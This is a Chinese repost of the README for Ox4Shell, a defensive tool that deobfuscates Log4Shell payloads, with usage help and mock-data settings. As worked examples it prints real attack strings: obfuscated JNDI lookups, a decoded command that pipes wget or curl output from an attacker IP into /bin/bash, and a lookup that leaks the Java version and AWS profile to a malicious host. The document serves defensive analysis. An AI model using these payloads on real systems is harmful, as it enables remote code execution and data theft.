Ox4Shell工具-轻松反混淆 Log4Shell 有效负载

2022-09-27 17:18:15 浏览数 (1)

描述

自 Log4Shell 漏洞 (CVE-2021-44228) 发布以来,创建了许多工具来混淆 Log4Shell 有效负载,使安全工程师的生活成为一场噩梦。

该工具旨在解开经过混淆的 Log4Shell 有效负载的真实内容。

例如,考虑以下经过混淆的有效负载:

代码语言:javascript复制
${zrch-Q(NGyN-yLkV:-}${j${sm:Eq9QDZ8-xEv54:-ndi}${GLX-MZK13n78y:GW2pQ:-:l}${ckX:2@BH[)]Tmw:a(:-da}${W(d:KSR)ky3:bv78UX2R-5MV:-p:/}/1.${)U:W9y=N:-}${i9yX1[:Z[Ve2=IkT=Z-96:-1.1}${[W*W:w@q.tjyo@-vL7thi26dIeB-HxjP:-.1}:38${Mh:n341x.Xl2L-8rHEeTW*=-lTNkvo:-90/}${sx3-9GTRv:-Cal}c$c${HR-ewA.mQ:g6@jJ:-z}3z${uY)u:7S2)P4ihH:M_S8fanL@AeX-PrW:-]}${S5D4[:qXhUBruo-QMr$1Bd-.=BmV:-}${_wjS:BIY0s:-Y_}p${SBKv-d9$5:-}Wx${Im:ajtV:-}AoL${=6wx-_HRvJK:-P}W${cR.1-lt3$R6R]x7-LomGH90)gAZ:NmYJx:-}h}
代码语言:javascript复制

运行 Ox4Shell 后,它会变成一种直观易读的形式:

代码语言:javascript复制
${jndi:ldap://1.1.1.1:3890/Calc$cz3z]Y_pWxAoLPWh}
代码语言:javascript复制

此工具还有助于识别和解码 base64 命令。例如,考虑以下混淆的有效负载:

代码语言:javascript复制
${jndi:ldap://1.1.1.1:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTg1LjI1MC4xNDguMTU3OjgwMDUvYWNjfHxjdXJsIC1vIC0gaHR0cDovLzE4NS4yNTAuMTQ4LjE1Nzo4MDA1L2FjYyl8L2Jpbi9iYXNoIA==}

运行 Ox4Shell 后,该工具揭示了攻击者的意图:

代码语言:javascript复制
${jndi:ldap://1.1.1.1:1389/Basic/(wget -O - http://185.250.148.157:8005/acc||curl -o - http://185.250.148.157:8005/acc)|/bin/bash
代码语言:javascript复制

⚠️我们建议Ox4Shell使用提供的文件 ( -f) 而不是内联有效负载 ( -p) 运行,因为某些 shell 环境会转义重要字符,因此会产生不准确的结果。

用法

要简单地运行该工具:

代码语言:javascript复制
~/Ox4Shell » python ox4shell.py --help
usage: ox4shell [-h] [-d] [-m MOCK] [--max-depth MAX_DEPTH] [--decode-base64] (-p PAYLOAD | -f FILE)

   ____       _  _   _____ _          _ _ 
  / __      | || | / ____| |        | | |
 | |  | |_  _| || || (___ | |__   ___| | |
 | |  |  / /__   ____ | '_  / _  | |
 | |__| |>  <   | | ____) | | | |  __/ | |
  ____//_/_  |_||_____/|_| |_|___|_|_|

Ox4Shell - Deobfuscate Log4Shell payloads with ease.
    Created by https://oxeye.io

General:
  -h, --help            Show this help message and exit
  -d, --debug           Enable debug mode (default: False)
  -m MOCK, --mock MOCK  The location of the mock data JSON file that replaces certain values in the payload (default: mock.json)
  --max-depth MAX_DEPTH
                        The maximum number of iteration to perform on a given payload (default: 150)
  --decode-base64       Payloads containing base64 will be decoded (default: False)

Targets:
  Choose which target payloads to run Ox4Shell on

  -p PAYLOAD, --payload PAYLOAD
                        A single payload to deobfuscate, make sure to escape '$' signs (default: None)
  -f FILE, --file FILE  A file containing payloads delimited by newline (default: None)

模拟数据

Log4j 库有一些独特的查找功能,允许用户查找环境变量、Java 进程的运行时信息等。此功能使威胁参与者能够探测特定信息,这些信息可以唯一地识别他们所针对的受感染机器。

Ox4Shell 使用该mock.json文件将常用值插入到某些查找函数中,例如,如果有效负载包含 value ${env:HOME},我们可以将其替换为自定义模拟值。

提供的默认模拟数据集是:

代码语言:javascript复制
{    "hostname": "ip-127.0.0.1",    "env": {        "aws_profile": "staging",        "user": "ubuntu",        "pwd": "/opt/",        "path": "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin"
    },    "sys": {        "java.version": "16.0.2",        "user.name": "ubuntu"
    },    "java": {        "version": "Java version 16.0.2",        "runtime": "OpenJDK Runtime Environment (build 1.8.0_181-b13) from Oracle Corporation",        "vm": "OpenJDK 64-Bit Server VM (build 25.181-b13, mixed mode)",        "os": "Linux 5.10.47-linuxkit unknown, architecture: amd64-64",        "locale": "default locale: en_US, platform encoding: UTF-8",        "hw": "processors: 1, architecture: amd64-64"
    }
}

例如,我们可以使用 Ox4Shell 的模拟功能对以下有效负载进行反混淆:

代码语言:javascript复制
~/Ox4Shell >> python ox4shell.py -p "${jndi:ldap://${sys:java.version}.${env:AWS_PROFILE}.malicious.server/a}"  ${jndi:ldap://16.0.2.staging.malicious.server/a}

作者

  • 丹尼尔·阿贝尔斯
  • 罗恩·维德

执照

该项目的源代码在 MIT 许可证下获得许可,您可以在 LICENSE 文件中找到该许可证。

工具下载:https://github.com/ox-eye/Ox4Shell#ox4shell

0 人点赞